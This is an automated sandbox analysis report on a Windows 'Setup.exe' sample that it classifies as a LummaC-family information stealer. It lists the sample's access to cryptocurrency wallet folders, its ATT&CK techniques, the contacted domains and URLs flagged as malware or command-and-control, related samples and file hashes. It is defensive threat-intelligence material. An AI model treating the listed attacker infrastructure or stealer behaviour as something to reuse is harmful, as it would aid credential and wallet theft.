              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\NEBFQQYWPS
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\XZXHAVGRAG
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\ZTGJILHXQB
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
              Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\UOOJJOZIRH
              Source: Yara match | File source: 00000000.00000003.1892472910.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: Setup.exe PID: 6860, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: Setup.exe PID: 6860, type: MEMORYSTR
              Source: Yara match | File source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Techniques by tactic (the number in front of a technique is the marker the report shows beside it):
              Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information
              Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server
              Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
              Execution: 12 Windows Management Instrumentation, 1 PowerShell, At, Cron, Launchd
              Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
              Privilege Escalation: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
              Defense Evasion: 21 Virtualization/Sandbox Evasion, 1 Deobfuscate/Decode Files or Information, 1 Obfuscated Files or Information, 1 DLL Side-Loading, Software Packing
              Credential Access: 1 OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
              Discovery: 221 Security Software Discovery, 21 Virtualization/Sandbox Evasion, 1 Process Discovery, 1 File and Directory Discovery, 22 System Information Discovery
              Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
              Collection: 1 Archive Collected Data, 31 Data from Local System, Data from Network Shared Drive, Input Capture, Keylogging
              Command and Control: 11 Encrypted Channel, 1 Ingress Tool Transfer, 3 Non-Application Layer Protocol, 114 Application Layer Protocol, Fallback Channels
              Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer
              Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact

              Source | Detection | Scanner
              Setup.exe | 16% | ReversingLabs
              Setup.exe | 9% | Virustotal
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=% | 0% | Avira URL Cloud | safe
              https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.com | 0% | Avira URL Cloud | safe
              https://cegu.shop:443/8574262446/ph.txt | 100% | Avira URL Cloud | malware
              sloppymisskr.click | 0% | Avira URL Cloud | safe
              https://cegu.shop/8574262446/ph.txt/P | 100% | Avira URL Cloud | malware
              https://sloppymisskr.click/b6 | 0% | Avira URL Cloud | safe
              https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc= | 0% | Avira URL Cloud | safe
              http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar | 0% | Avira URL Cloud | safe
              https://sloppymisskr.click/apie | 0% | Avira URL Cloud | safe
              https://sloppymisskr.click/apib | 0% | Avira URL Cloud | safe
              https://sloppymisskr.click/apisp | 0% | Avira URL Cloud | safe
              https://sloppymisskr.click/ | 0% | Avira URL Cloud | safe
              https://klipvumisui.shop/int_clp_sha.txtf1 | 100% | Avira URL Cloud | malware
              https://vivporn.com/wp-content/plugins/ | 0% | Avira URL Cloud | safe
              https://sloppymisskr.click/apiy | 0% | Avira URL Cloud | safe
              https://www.tomabo.com/mp4-player/download.html | 0% | Avira URL Cloud | safe
              https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofile | 0% | Avira URL Cloud | safe
              https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&em | 0% | Avira URL Cloud | safe
              https://sloppymisskr.click/api | 0% | Avira URL Cloud | safe
              https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.c | 0% | Avira URL Cloud | safe
              https://sloppymisskr.click/$ | 0% | Avira URL Cloud | safe
              https://cegu.shop/4Q | 100% | Avira URL Cloud | malware
              https://www.hotmovs.com/ | 0% | Avira URL Cloud | safe
              https://sloppymisskr.click/apiW | 0% | Avira URL Cloud | safe
              https://www.tomabo.com/videos/dog-and-balls.mp4Please | 0% | Avira URL Cloud | safe
              https://cegu.shop/1B | 100% | Avira URL Cloud | malware
              https://www.tomabo.comVersion | 0% | Avira URL Cloud | safe
              https://sloppymisskr.click/panym | 0% | Avira URL Cloud | safe
              https://cegu.shop// | 100% | Avira URL Cloud | malware
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              cegu.shop | 185.161.251.21 | true | false | | high
              sloppymisskr.click | 104.21.90.109 | true | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              sloppymisskr.click | true | Avira URL Cloud: safe | unknown
              https://sloppymisskr.click/api | true | Avira URL Cloud: safe | unknown
              rabidcowse.shop | false | | high
              wholersorie.shop | false | | high
              cloudewahsj.shop | false | | high
              noisycuttej.shop | false | | high
              nearycrepso.shop | false | | high
              https://cegu.shop/8574262446/ph.txt | false | | high
              framekgirus.shop | false | | high
              tirepublicerj.shop | false | | high
              abruptyopsn.shop | false | | high
              Name | Source | Malicious (followed by Antivirus Detection, where present, and Reputation)
              https://cegu.shop:443/8574262446/ph.txt | Setup.exe, 00000000.00000002.4119493222.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044825543.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045011086.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmp | true
              • Avira URL Cloud: malware
              unknown
              https://duckduckgo.com/chrome_newtab | Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | false
              high
              https://duckduckgo.com/ac/?q= | Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | false
              high
              https://www.redtube.com/videohttps://www.thumbzilla.com/Thumbzillathumbzilla.comthumbzilla. | Setup.exe | false
              high
              https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=% | Setup.exe | false
              • Avira URL Cloud: safe
              unknown
              https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.com | Setup.exe | false
              • Avira URL Cloud: safe
              unknown
              https://dfgh.online/invoker.php?compName= | Setup.exe, Setup.exe, 00000000.00000002.4119493222.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044825543.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044975990.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120702904.0000000003594000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045011086.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045122596.0000000003593000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044550396.0000000003592000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094519509.0000000003591000.00000004.00000800.00020000.00000000.sdmp | false
              high
              https://www.yahoo.com/Yahoo | Setup.exe | false
              high
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | false
              high
              https://www.youtube.com/%I64d-%I64d-%I64d0-%I64dContent-Type: | Setup.exe | false
              high
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | Setup.exe, 00000000.00000003.1834178767.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822159529.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822224930.00000000035C9000.00000004.00000800.00020000.00000000.sdmp | false
              high
              https://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPlease | Setup.exe | false
              high
              http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar | Setup.exe | false
              • Avira URL Cloud: safe
              unknown
              https://sloppymisskr.click/b6 | Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119539930.00000000007E6000.00000004.00000020.00020000.00000000.sdmp | false
              • Avira URL Cloud: safe
              unknown
              http://ocsp.starfieldtech.com/0D | Setup.exe | false
              high
              https://sloppymisskr.click/apie | Setup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp | false
              • Avira URL Cloud: safe
              unknown
              https://cegu.shop/8574262446/ph.txt/P | Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmp | true
              • Avira URL Cloud: malware
              unknown
              https://www.txxx.com/ | Setup.exe | false
              high
              https://sloppymisskr.click/apib | Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp | false
              • Avira URL Cloud: safe
              unknown
              https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc= | Setup.exe | false
              • Avira URL Cloud: safe
              unknown
              https://sloppymisskr.click/apisp | Setup.exe, 00000000.00000003.1892306082.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903114467.0000000003568000.00000004.00000800.00020000.00000000.sdmp | false
              • Avira URL Cloud: safe
              unknown
              http://crl.thawte.com/ThawteTimestampingCA.crl0 | Setup.exe | false
              high
              http://x1.c.lencr.org/0 | Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | false
              high
              http://x1.i.lencr.org/0 | Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | false
              high
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | Setup.exe, 00000000.00000003.1822224930.00000000035A4000.00000004.00000800.00020000.00000000.sdmp | false
              high
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | false
              high
              https://sloppymisskr.click/ | Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834336363.0000000003582000.00000004.00000800.00020000.00000000.sdmp | false
              • Avira URL Cloud: safe
              unknown
              https://www.eporner.com/EPORNEReporner.comeporner.cdn.eporner.comhttps://www.eporner.com/video-%s//& | Setup.exe | false
              high
              https://vivporn.com/wp-content/plugins/ | Setup.exe | false
              • Avira URL Cloud: safe
              unknown
              https://klipvumisui.shop/int_clp_sha.txtf1 | Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp | false
              • Avira URL Cloud: malware
              unknown
              https://sloppymisskr.click/apiy | Setup.exe, 00000000.00000003.1902947617.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | false
              • Avira URL Cloud: safe
              unknown
              http://crl.starfieldtech.com/repository/sfsroot.crl0P | Setup.exe | false
              high
              https://www.tomabo.com/mp4-player/download.html | Setup.exe | false
              • Avira URL Cloud: safe
              unknown
              https://support.mozilla.org/products/firefoxgro.all | Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmp | false
              high
              https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofile | Setup.exe | false
              • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&emSetup.exefalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://klipvumisui.shop/int_clp_sha.txtSetup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://sloppymisskr.click/apiESetup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.cSetup.exefalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://sloppymisskr.click/$Setup.exe, 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cegu.shop/4QSetup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                http://ocsp.thawte.com0Setup.exefalse
                                                                                  high
                                                                                  https://www.youtube.com/playlist?list=%shttps://i.ytimg.com/vi/%s/maxresdefault.jpghttps://i.ytimg.cSetup.exefalse
                                                                                    high
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://ocsp.rootca1.amazontrust.com0:Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Setup.exe, 00000000.00000003.1834178767.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822159529.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822224930.00000000035C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cegu.shop/1BSetup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://sloppymisskr.click/apiWSetup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903114467.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://certificates.starfieldtech.com/repository/1604Setup.exefalse
                                                                                              high
                                                                                              https://www.ecosia.org/newtab/Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.youtube.com/youtubei/v1/player?key=%s&prettyPrint=falseOriginX-Youtube-Client-VersionX-YSetup.exefalse
                                                                                                  high
                                                                                                  http://www.symauth.com/cps0(Setup.exefalse
                                                                                                    high
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.hotmovs.com/Setup.exefalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://ac.ecosia.org/autocomplete?q=Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999lengthSecondshlsManifeSetup.exefalse
                                                                                                          high
                                                                                                          http://crl.starfieldtech.com/repository/0Setup.exefalse
                                                                                                            high
                                                                                                            https://www.tomabo.com/videos/dog-and-balls.mp4PleaseSetup.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.tomabo.comVersionSetup.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://crl.microSetup.exe, Setup.exe, 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.tnaflix.com/Tnaflixtnaflix.comtnaflix.Setup.exefalse
                                                                                                                high
                                                                                                                http://www.symauth.com/rpa00Setup.exefalse
                                                                                                                  high
                                                                                                                  https://support.microsofSetup.exe, 00000000.00000003.1822159529.00000000035D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://sloppymisskr.click/panymSetup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119539930.00000000007E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://www.redtube.com/RedTuberedtube.comredtube.https://www.redtube.com/%sid=/player/?id=?id=Setup.exefalse
                                                                                                                        high
                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSetup.exe, 00000000.00000003.1822224930.00000000035A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.google.com/GoogleSetup.exefalse
                                                                                                                              high
                                                                                                                              https://cegu.shop//Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://www.eporner.com/xhr/video/%s?hash=%s&device=generic&domain=www.eporner.com&fallback=falsevarSetup.exefalse
                                                                                                                                high
                                                                                                                                https://api.github.com/repos/ytdl-org/ytdl-nightly/releases/latestMX_ytdlbrowser_download_urlyoutubeSetup.exefalse
                                                                                                                                  high
                                                                                                                                  https://www.youtube.com/youtubei/v1/browse?key=%s&prettyPrint=falseX-Goog-Visitor-IdcontinuationclicSetup.exefalse
                                                                                                                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.90.109 | sloppymisskr.click | United States | 13335 | CLOUDFLARENETUS | true
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584503
Start date and time: 2025-01-05 17:53:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Setup.exe, PID 6860 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
11:54:14 | API Interceptor | 10x Sleep call for process: Setup.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.161.251.21 | Full_Setup.exe | malicious | LummaC |
185.161.251.21 | Setup.exe | malicious | LummaC |
185.161.251.21 | SET_UP.exe | malicious | LummaC |
185.161.251.21 | Setup.exe | malicious | LummaC |
185.161.251.21 | Active_Setup.exe | malicious | LummaC Stealer |
185.161.251.21 | Active_Setup.exe | malicious | LummaC |
185.161.251.21 | Poket.mp4.hta | malicious | LummaC |
185.161.251.21 | setup.exe | malicious | LummaC |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
cegu.shop | Full_Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | SET_UP.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Active_Setup.exe | malicious | LummaC Stealer | 185.161.251.21
cegu.shop | Active_Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Poket.mp4.hta | malicious | LummaC | 185.161.251.21
cegu.shop | setup.exe | malicious | LummaC | 185.161.251.21
Associated Sample Name / URL | Detection | Threat Name | Context (listed below each row)
Match: CLOUDFLARENETUS
Full_Setup.exe | malicious | LummaC
• 172.67.196.191
momo.spc.elf | malicious | Mirai
• 1.1.1.1
momo.ppc.elf | malicious | Mirai
• 1.1.1.1
momo.sh4.elf | malicious | Mirai
• 1.1.1.1
momo.x86.elf | malicious | Mirai
• 1.1.1.1
momo.m68k.elf | malicious | Mirai
• 1.1.1.1
z0r0.sh4.elf | malicious | Mirai
• 172.71.176.132
drop1.exe | malicious | CredGrabber, Meduza Stealer
• 104.26.13.205
avaydna.exe | malicious | Njrat
• 104.17.25.14
HateSpeech2024_Summary.pdf.lnk.bin.lnk | malicious | Emmenhtal Loader, MalLnk
• 104.21.2.79
Match: NTLGB
Full_Setup.exe | malicious | LummaC
• 185.161.251.21
momo.mips.elf | malicious | Mirai
• 82.18.222.135
momo.arm.elf | malicious | Mirai
• 82.17.192.171
momo.mpsl.elf | malicious | Mirai
• 82.128.104.220
momo.arm7.elf | malicious | Mirai
• 86.15.30.49
z0r0.m68k.elf | malicious | Mirai
• 86.17.1.179
z0r0.x86.elf | malicious | Mirai
• 81.99.50.70
z0r0.sh4.elf | malicious | Mirai
• 81.103.250.108
z0r0.i686.elf | malicious | Mirai
• 82.2.230.58
armv4l.elf | malicious | Unknown
• 82.38.39.22
Associated Sample Name / URL | Detection | Threat Name | Context (listed below each row)
Match: a0e9f5d64349fb13191bc781f81f42e1
Full_Setup.exe | malicious | LummaC
• 104.21.90.109
• 185.161.251.21
K27Yg4V48M.exe | malicious | LummaC
• 104.21.90.109
• 185.161.251.21
IH5XqCdf06.exe | malicious | LummaC
• 104.21.90.109
• 185.161.251.21
3jL3mqtjCn.exe | malicious | LummaC
• 104.21.90.109
• 185.161.251.21
file.exe | malicious | LummaC, PureLog Stealer
• 104.21.90.109
• 185.161.251.21
J18zxRjOes.exe | malicious | LummaC
• 104.21.90.109
• 185.161.251.21
ZxSWvC0Tz7.exe | malicious | LummaC
• 104.21.90.109
• 185.161.251.21
SOElePqvtf.exe | malicious | LummaC
• 104.21.90.109
• 185.161.251.21
m4lz5aeAiN.exe | malicious | LummaC
• 104.21.90.109
• 185.161.251.21
ehD7zv3l4U.exe | malicious | LummaC
• 104.21.90.109
• 185.161.251.21
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 0.6971701645747819
TrID:
• Win32 Executable (generic) a (10002005/4) 99.53%
• InstallShield setup (43055/19) 0.43%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Setup.exe
File size: 76'573'072 bytes
MD5: 2f84c8a115eb4fa477054b3915d6d156
SHA1: 0aa8a86694bf487867861c8d51919b558b62ef3c
SHA256: a13eeb5717208e256a8b59d7baa24754f0b81f9fa9d7e7a0cf60b07fc0e489dd
SHA512: 3c2abae78db024aded2b34c4a7a1bb1ed76afd4fcafceb7948a3a08a5b08c86e84a6b1734fb367ffdcb5d408d8dad4c85e9195ce41df4ddd6525db41df7ef508
SSDEEP: 49152:H3UdqOr+inXPPpBs1qg5lRCT8DZ5mK5fIbgD:H8F++gfXRxDIgD
TLSH: 72F76C103643C1A2F72BF770892792E9A5E05C3CFF9206CFD54BBB1B65BA5C4423A919
